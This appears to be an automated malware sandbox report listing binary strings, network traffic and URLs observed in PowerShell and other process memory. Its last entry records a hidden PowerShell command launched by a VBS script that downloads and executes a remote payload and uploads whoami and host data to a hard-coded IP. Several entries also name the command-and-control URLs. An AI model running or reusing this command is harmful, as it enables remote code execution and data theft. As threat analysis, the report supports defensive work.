Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\Z:\syscalls\amsi64_7332.amsi.csve.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79727000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3415629273.000001DE5F8CD000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: dbpdbtem.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ws\System.Core.pdb;+O source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo1 source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: *on.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.41.168.139 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT |
Source: global traffic |
HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive |
Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr |
String found in binary or memory: http://2.59.222.98:28402/page107 |
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:28402/page107Bytestf8.GetBytesesX |
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:28402/page107X |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62A22000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820 |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62A2A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820( |
Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/KfngnHb |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/KfngnHbx |
Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr |
String found in binary or memory: http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt |
Source: powershell.exe, 00000006.00000002.3416550367.000001DE5FA85000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt |
Source: powershell.exe, 00000006.00000002.3475796002.000001DE79A90000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.m1 |
Source: svchost.exe, 00000009.00000002.3748403757.0000027DAD800000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/ |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567 |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg |
Source: qmgr.db.9.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe |
Source: qmgr.db.9.dr |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr |
String found in binary or memory: http://x1.i.lencr.org/ |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078005E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: edb.log.9.dr, qmgr.db.9.dr |
String found in binary or memory: https://g.live.com/odclientsettings/Prod/C: |
Source: svchost.exe, 00000009.00000003.2101982072.0000027DAD750000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C: |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000006.00000002.3417701270.000001DE620D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078055F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: qmgr.db.9.dr |
String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C: |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} |
|